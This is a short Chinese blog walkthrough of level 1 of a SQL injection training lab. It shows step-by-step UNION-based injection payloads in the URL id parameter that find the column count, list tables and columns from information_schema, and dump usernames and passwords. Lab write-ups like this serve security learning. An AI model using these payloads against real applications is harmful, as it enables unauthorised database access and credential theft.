Less-1

GET_单引号_字符型注入

0x01 判断注入类型

?id=1
?id=1'
?id=1"

'单引号报错
to use near ''1'' LIMIT 0,1' at line 1
'1'' LIMIT 0,1
'1''
输入的单引号写入了查询语句

存在,GET,单引号注入

0x02 获取回显字段数

?id=1'order by 4--+
报错,说明有3列

0x03 获取数据库名

?id=-1'union select 1,database(),user()--+
得到security数据库

0x04 获取表名

?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="security"--+

0x05 获取列名

?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name="users" and table_schema="security"--+

0x06 获取数据

?id=-1'union select 1,2,group_concat(username,password) from users--+

参考链接:
https://www.jianshu.com/p/b5ab19751955

© 版权声明
THE END
喜欢就支持一下吧!
点赞0
分享